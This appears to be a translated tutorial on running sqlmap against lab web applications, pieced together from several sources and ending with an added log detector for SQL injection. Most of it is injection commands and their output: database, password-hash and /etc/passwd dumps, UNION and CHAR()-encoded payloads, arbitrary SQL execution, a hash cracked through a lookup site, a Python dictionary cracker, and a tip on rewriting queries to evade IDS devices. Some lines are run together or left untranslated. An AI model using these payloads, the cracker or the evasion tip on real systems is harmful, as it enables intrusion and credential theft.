MySQL 4.1 and later use SHA1-based password hashes (the ones with the leading '*').

http://www.md5decrypter.co.uk/sha1-decrypt.aspx

263027ecc84aa7b81ea86b0ebecafe20bc8804fc = dojo

[02:35:19] [INFO] fetching database names
[02:35:19] [INFO] read from file '/pentest/database/sqlmap/output/IP-Address/session': information_schema, dvwa, mysql, w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[02:35:19] [INFO] fetching tables for databases: w3af_test, dvwa, information_schema, mysql
Database: w3af_test
[2 tables]
+---------------------------------------+
| customers |
| users |
+---------------------------------------+

Database: dvwa
[2 tables]
+---------------------------------------+
| guestbook |
| users |
+---------------------------------------+

[02:35:20] [INFO] fetching columns for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| avatar | varchar(70) |
| first_name | varchar(15) |
| last_name | varchar(15) |
| password | varchar(32) |
| user | varchar(15) |
| user_id | int(6) |
+------------+-------------+
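To show what sqlmap's 'md5_generic_passwd' and 'mysql_passwd' dictionary attacks above actually do, and to let you audit a dumped password column offline instead of pasting hashes into a lookup site, here is an added Python example (not sqlmap's code). The sample column is constructed from the dvwa.users MD5 values and the root hash shown above; the wordlist is a made-up stand-in for sqlmap's txt/wordlist.txt.

```python
import hashlib
import re

# Constructed sample column: the four MD5 values sqlmap dumped from dvwa.users above,
# the MySQL-format hash it reported for 'root', and one value of unknown shape.
SAMPLE_HASHES = [
    "0d107d09f5bbe40cade3de5c71e9e9b7",
    "8d3533d75ae2c3966d7e0d4fcc69216b",
    "e99a18c428cb38d5f260853678922e03",
    "5f4dcc3b5aa765d61d8327deb882cf99",
    "*263027ECC84AA7B81EA86B0EBECAFE20BC8804FC",
    "not-a-hash",
]

# Constructed mini wordlist standing in for sqlmap's txt/wordlist.txt.
WORDLIST = ["123456", "password", "letmein", "abc123", "charley", "dojo"]

# Shape checks mirroring sqlmap's "recognized possible password hash values" step.
HASH_SHAPES = [
    ("md5_generic_passwd", re.compile(r"^[0-9a-f]{32}$", re.I)),
    ("mysql_passwd", re.compile(r"^\*[0-9A-F]{40}$", re.I)),
]


def identify_hash(value):
    """Return the sqlmap hash-method name for a value, or None if the shape is unknown."""
    for method, shape in HASH_SHAPES:
        if shape.match(value):
            return method
    return None


def md5_generic_passwd(password):
    """Unsalted MD5, which is how DVWA stores dvwa.users.password."""
    return hashlib.md5(password.encode()).hexdigest()


def mysql_passwd(password):
    """MySQL 4.1+ native hash: '*' followed by uppercase hex of SHA1(SHA1(password))."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


HASHERS = {"md5_generic_passwd": md5_generic_passwd, "mysql_passwd": mysql_passwd}


def dictionary_check(hash_value, wordlist):
    """Return the wordlist entry that reproduces hash_value, or None (no clear password found)."""
    method = identify_hash(hash_value)
    if method is None:
        return None
    hasher = HASHERS[method]
    target = hash_value.lower()
    for word in wordlist:
        if hasher(word).lower() == target:
            return word
    return None


def audit(hashes, wordlist):
    """Map every hash in a dumped column to its recovered plaintext (or None)."""
    return {h: dictionary_check(h, wordlist) for h in hashes}


if __name__ == "__main__":
    for h, clear in audit(SAMPLE_HASHES, WORDLIST).items():
        method = identify_hash(h) or "unrecognized"
        print(f"{h:<42} {method:<20} {clear or 'no clear password found'}")
```

Both formats are unsalted and fast, which is why a plain wordlist (or a lookup site) recovers them; an application storing passwords should use a salted, slow KDF so that a dumped column does not yield logins this cheaply.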

Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements.
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
--search Search column(s), table(s) and/or database name(s)
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--start=LIMITSTART First query output entry to retrieve
--stop=LIMITSTOP Last query output entry to retrieve
--first=FIRSTCHAR First query output word character to retrieve
--last=LASTCHAR Last query output word character to retrieve
--sql-query=QUERY SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell

Here is a list of major features implemented in sqlmap:

* Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server database management system back-ends. Besides these four DBMS, sqlmap can also identify Microsoft Access, DB2, Informix and Sybase;
* Extensive database management system back-end fingerprint based upon:
  o Inband DBMS error messages
  o DBMS banner parsing
  o DBMS functions output comparison
  o DBMS specific features such as MySQL comment injection
  o Passive SQL injection fuzzing
* It fully supports two SQL injection techniques:
  o Blind SQL injection, also known as Inference SQL injection
  o Inband SQL injection, also known as UNION query SQL injection
  and it partially supports error based SQL injection as one of the vectors for database management system fingerprint;
* It automatically tests all provided GET, POST, Cookie and User-Agent parameters to find dynamic ones. On these it automatically tests and detects the ones affected by SQL injection. Moreover each dynamic parameter is tested for numeric, single quoted string, double quoted string and all of these three types with one and two brackets to find which is the valid syntax to perform further injections with;
* It is possible to provide the name of the only parameter(s) that you want to perform tests and use for injection on, be they GET, POST or Cookie parameters;
* SQL injection testing and detection does not depend upon the web application database management system back-end. SQL injection exploiting and query syntax obviously depend upon the web application database management system back-end;
* It recognizes valid queries from false ones based upon HTML output page hash comparison by default, but it is also possible to choose to perform such a test based upon string matching;
* HTTP requests can be performed in both HTTP methods GET and POST (default: GET);
* It is possible to perform HTTP requests using a HTTP User-Agent header string randomly selected from a text file;
* It is possible to provide a HTTP Cookie header string, useful when the web application requires authentication based upon cookies and you have such data;
* It is possible to provide an anonymous HTTP proxy address and port to pass the HTTP requests to the target URL through;
* It is possible to provide the remote DBMS back-end if you already know it, saving sqlmap the time needed to fingerprint it;
* It supports various command line options to get the database management system banner, current DBMS user, current DBMS database, enumerate users, users password hashes, databases, tables, columns, dump tables entries, dump the entire DBMS, retrieve an arbitrary file's content (if the remote DBMS is MySQL) and provide your own SQL SELECT statement to be evaluated;
* It is possible to make sqlmap automatically detect if the affected parameter is also affected by an UNION query SQL injection and, in such case, to use it to exploit the vulnerability;
* It is possible to exclude system databases when enumerating tables, useful when dumping the entire DBMS databases tables entries and you want to skip the default DBMS data;
* It is possible to view the estimated time of arrival for each query output, updated in real time while performing the SQL injection attack;
* Support to increase the verbosity level of output messages;
* It is possible to save queries performed and their retrieved value in real time on an output text file and continue the injection resuming from such file at a later time;
* PHP setting magic_quotes_gpc bypass by encoding every query string, between single quotes, with CHAR (or similar) DBMS specific function.

Last night I could not resist, had a look at it and tested it. The SQL statements in it are far too simple, but you can customise them and change them into more complex statements to get past injection detection and other IDS devices. A little later I will compile a DOS version for you.

1. First install Python 2.5.
2. Then go into the sqlmap directory and run sqlmap.

Detailed usage

1. sqlmap -u <injection point>

2. sqlmap -g "keyword" // this injects via Google search; it does not work at the moment, I do not know why; you can change it to Baidu directly

3. python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1
[hh:mm:25] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:26] [INFO] url is stable
[hh:mm:26] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:26] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:26] [INFO] GET parameter 'id' is dynamic
[hh:mm:26] [INFO] testing sql injection on GET parameter 'id'
[hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter 'id'
[hh:mm:26] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
[hh:mm:26] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:26] [INFO] testing MySQL
[hh:mm:26] [INFO] query: CONCAT('5', '5')
[hh:mm:26] [INFO] retrieved: 55
[hh:mm:26] [INFO] performed 20 queries in 0 seconds
[hh:mm:26] [INFO] confirming MySQL
[hh:mm:26] [INFO] query: LENGTH('5')
[hh:mm:26] [INFO] retrieved: 1
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
[hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1
[hh:mm:26] [INFO] retrieved: 5
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
remote DBMS: MySQL >= 5.0.0

4. Inject a specified parameter
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -p "id"
[hh:mm:17] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:18] [INFO] url is stable
[hh:mm:18] [INFO] testing sql injection on parameter 'id'
[hh:mm:18] [INFO] testing numeric/unescaped injection on parameter 'id'
[hh:mm:18] [INFO] confirming numeric/unescaped injection on parameter 'id'
[hh:mm:18] [INFO] parameter 'id' is numeric/unescaped injectable
[...]
Or if you want to provide more than one parameter, for instance:
$ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -p "cat,id"

5. Specify the method and the POST data
python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" --data "id=1&cat=2"

6. Specify a cookie, so you can inject into pages that require login
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --cookie "COOKIE_VALUE"

7. Inject through a proxy
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy "http://127.0.0.1:8118"

8. Specify a keyword; it can also be left out, in which case the program decides automatically from the hash of the returned page
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string "STRING_ON_TRUE_PAGE"

9. Specify the DBMS, so it does not have to guess among the other database types; this improves efficiency.
--remote-dbms

10. Fingerprint the database type
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f

11. Get the banner
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -b
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'

12. Get the current database, current user, all users, passwords and all available databases.
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --current-db
current database: 'testdb'

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --users
database management system users [5]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'leboyer'
[*] 'root'@'localhost'
[*] 'testuser'@'localhost'

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --passwords
database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: *XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[*] root [1]:
    password hash: *YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
[*] testuser [1]:
    password hash: *ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --dbs
available databases [3]:
[*] information_schema
[*] mysql
[*] testdb

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --tables -D "information_schema"
Database: information_schema
[16 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLLATIONS                            |
| COLUMN_PRIVILEGES                     |
| COLUMNS                               |
| KEY_COLUMN_USAGE                      |
| ROUTINES                              |
| SCHEMA_PRIVILEGES                     |
| SCHEMATA                              |
| STATISTICS                            |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TABLES                                |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --columns -T "user" -D "mysql"
Database: mysql
Table: user
[37 columns]
+-----------------------+------+
| Column                | Type |
+-----------------------+------+
| Alter_priv            | enum |
| Alter_routine_priv    | enum |
| Create_priv           | enum |
| Create_routine_priv   | enum |
| Create_tmp_table_priv | enum |
| Create_user_priv      | enum |
| Create_view_priv      | enum |
| Delete_priv           | enum |
| Drop_priv             | enum |
| Execute_priv          | enum |
| File_priv             | enum |
| Grant_priv            | enum |
| Host                  | char |
| Index_priv            | enum |
| Insert_priv           | enum |
| Lock_tables_priv      | enum |
| max_connections       | int  |
| max_questions         | int  |
| max_updates           | int  |
| max_user_connections  | int  |
| Password              | char |
| Process_priv          | enum |
| References_priv       | enum |
| Reload_priv           | enum |
| Repl_client_priv      | enum |
| Repl_slave_priv       | enum |
| Select_priv           | enum |
| Show_db_priv          | enum |
| Show_view_priv        | enum |
| Shutdown_priv         | enum |
| ssl_cipher            | blob |
| ssl_type              | enum |
| Super_priv            | enum |
| Update_priv           | enum |
| User                  | char |
| x509_issuer           | blob |
| x509_subject          | blob |
+-----------------------+------+

13. Display the content of a specified file, generally used with PHP
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --file /etc/passwd
/etc/passwd:
---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/false
backup:x:34:34:backup:/var/backups:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false postgres:x:105:107:PostgreSQL administrator,,,:/var/lib/postgresql:/ bin/bash inquis:x:1000:100:Bernardo Damele,,,:/home/inquis:/bin/bash --- 14、执行你自己的sql语句。 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -e "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1" [hh:mm:18] [INFO] fetching expression output: 'SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1' [hh:mm:18] [INFO] query: SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1 [hh:mm:18] [INFO] retrieved: YYYYYYYYYYYYYYYY [hh:mm:19] [INFO] performed 118 queries in 0 seconds SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1: 'YYYYYYYYYYYYYYYY' 15、union注入 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --union- check valid union: 'http://192.168.1.47/page.php?id=1 UNION ALL SELECT NULL, NULL, NULL--&cat=2' python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -- union-use --banner [...] [hh:mm:24] [INFO] testing inband sql injection on parameter 'id' [hh:mm:24] [INFO] the target url could be affected by an inband sql injection vulnerability [hh:mm:24] [INFO] confirming inband sql injection on parameter 'id' [...] [hh:mm:24] [INFO] fetching banner [hh:mm:24] [INFO] request: http://192.168.1.47/page.php?id=1 UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), VERSION(), CHAR(95,95,83,84,79,80,95,95)), NULL, NULL--&cat=2 [hh:mm:24] [INFO] performed 1 queries in 0 seconds banner: '5.0.38-Ubuntu_0ubuntu1.1-log' 16、保存注入过程到一个文件,还可以从文件恢复出注入过程,很方便,一大特色。你可以在注入的时候中断,有时间再继续。 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -b - o "sqlmap.log" [...] 
[hh:mm:09] [INFO] fetching banner [hh:mm:09] [INFO] query: VERSION() [hh:mm:09] [INFO] retrieved: 5.0.30-Debian_3-log [hh:mm:11] [INFO] performed 139 queries in 1 seconds banner: '5.0.38-Ubuntu_0ubuntu1.1-log' python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -- banner -o "sqlmap.log" --resume [...] [hh:mm:13] [INFO] fetching banner [hh:mm:13] [INFO] query: VERSION() [hh:mm:13] [INFO] retrieved the length of query: 26 [hh:mm:13] [INFO] resumed from file 'sqlmap.log': 5.0.45-Deb [hh:mm:13] [INFO] retrieved: ian_1ubuntu3-log banner:
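Every technique shown above leaves a recognizable trail in the web server's access log: the boolean probes behind the "performed N queries" counters, the "UNION ALL SELECT NULL, NULL, NULL--" column-count check from item 15, the read of information_schema, and the CHAR(95,95,83,...) encoding that the magic_quotes_gpc bypass relies on. The script below is an added example from the editor, not code from the original page or from sqlmap: it parses common-log-format lines (the sample lines are constructed to mirror the request shapes shown above, not real traffic), flags injection syntax per query parameter, decodes CHAR() lists so the tool's __START__/__STOP__ delimiters become readable, and counts how many tainted requests one client aimed at the same parameter. The indicator set, the burst threshold and the log sample are assumptions made for the illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log sample (common log format); not taken from the page.
# It replays the request shapes visible in the sqlmap output above: boolean
# probes on `id`, an information_schema read, the UNION column-count check and
# the CHAR()-encoded __START__/__STOP__ marker wrapped around VERSION().
SAMPLE_LOG = """\
192.168.1.10 - - [10/Oct/2023:17:05:52 +0000] "GET /page.php?id=1&cat=2 HTTP/1.1" 200 512
192.168.1.10 - - [10/Oct/2023:17:05:52 +0000] "GET /page.php?id=1%20AND%201=1&cat=2 HTTP/1.1" 200 512
192.168.1.10 - - [10/Oct/2023:17:05:52 +0000] "GET /page.php?id=1%20AND%201=2&cat=2 HTTP/1.1" 200 498
192.168.1.10 - - [10/Oct/2023:17:05:53 +0000] "GET /page.php?id=1%20AND%20ORD(MID((SELECT%205%20FROM%20information_schema.TABLES%20LIMIT%200,1),1,1))>52&cat=2 HTTP/1.1" 200 512
192.168.1.10 - - [10/Oct/2023:17:05:53 +0000] "GET /page.php?id=1%20UNION%20ALL%20SELECT%20NULL,%20NULL,%20NULL--&cat=2 HTTP/1.1" 200 530
192.168.1.10 - - [10/Oct/2023:17:05:54 +0000] "GET /page.php?id=1%20UNION%20ALL%20SELECT%20CONCAT(CHAR(95,95,83,84,65,82,84,95,95),%20VERSION(),%20CHAR(95,95,83,84,79,80,95,95)),%20NULL,%20NULL--&cat=2 HTTP/1.1" 200 560
10.0.0.7 - - [10/Oct/2023:17:06:01 +0000] "GET /page.php?id=7&cat=2 HTTP/1.1" 200 512
"""

# Common log format: client, identd, user, [timestamp], "METHOD target PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Indicators keyed on SQL structure rather than on quote characters, because the
# CHAR() trick described above produces payloads that contain no quotes at all.
INDICATORS = {
    "union_select": re.compile(r"\bUNION\b\s+(?:ALL\s+)?SELECT\b", re.I),
    "boolean_probe": re.compile(r"\bAND\b\s+\d+\s*=\s*\d+", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "comment_terminator": re.compile(r"--\s*$|#\s*$|/\*"),
    "char_encoding": re.compile(r"\bCHAR\s*\(\s*\d+(?:\s*,\s*\d+)+\s*\)", re.I),
}
CHAR_RE = re.compile(r"\bCHAR\s*\(\s*([\d\s,]+)\)", re.I)


def decode_char_calls(value):
    """Turn every CHAR(n, n, ...) list in a parameter value back into printable text."""
    decoded = []
    for m in CHAR_RE.finditer(value):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        decoded.append("".join(chr(c) for c in codes if 32 <= c < 127))
    return decoded


def analyze_request(target):
    """Return (path, {param: {"indicators": [...], "decoded_char": [...]}}) for one request target."""
    parts = urlsplit(target)
    findings = {}
    # parse_qsl percent-decodes the values, so the regexes see the SQL as the DBMS would
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        hits = sorted(k for k, rx in INDICATORS.items() if rx.search(value))
        if hits:
            findings[name] = {"indicators": hits, "decoded_char": decode_char_calls(value)}
    return parts.path, findings


def scan_log(text, burst_threshold=3):
    """Scan access-log text and return (alerts, bursts).

    alerts: one dict per tainted parameter occurrence, in log order.
    bursts: {(ip, path, param): count} for clients that sent at least
            burst_threshold tainted requests against one parameter; the
            "performed N queries" counters above show why volume per
            parameter is a strong signal for blind techniques.
    """
    alerts = []
    per_param = Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than crash
        path, findings = analyze_request(m.group("target"))
        for param, info in findings.items():
            per_param[(m.group("ip"), path, param)] += 1
            alerts.append({"ip": m.group("ip"), "ts": m.group("ts"), "path": path, "param": param, **info})
    bursts = {key: n for key, n in per_param.items() if n >= burst_threshold}
    return alerts, bursts


if __name__ == "__main__":
    found, burst_map = scan_log(SAMPLE_LOG)
    for a in found:
        extra = f" decodes to {a['decoded_char']}" if a["decoded_char"] else ""
        print(f"{a['ts']} {a['ip']} {a['path']} param={a['param']} {','.join(a['indicators'])}{extra}")
    for (ip, path, param), n in burst_map.items():
        print(f"BURST: {ip} sent {n} tainted requests against {path}?{param}")
```

On the sample, five requests from 192.168.1.10 are flagged on the id parameter, the CHAR() lists decode to __START__ and __STOP__, and the per-parameter counter reports one burst; the cat parameter and the other client stay clean. The CHAR()-encoded payload contains no quote character at all, which is exactly why escaping quotes (magic_quotes_gpc) is not a fix: on the application side the remedy for page.php is a parameterized query for id, and on the monitoring side a rule that keys on SQL structure and request volume per parameter rather than on quotes.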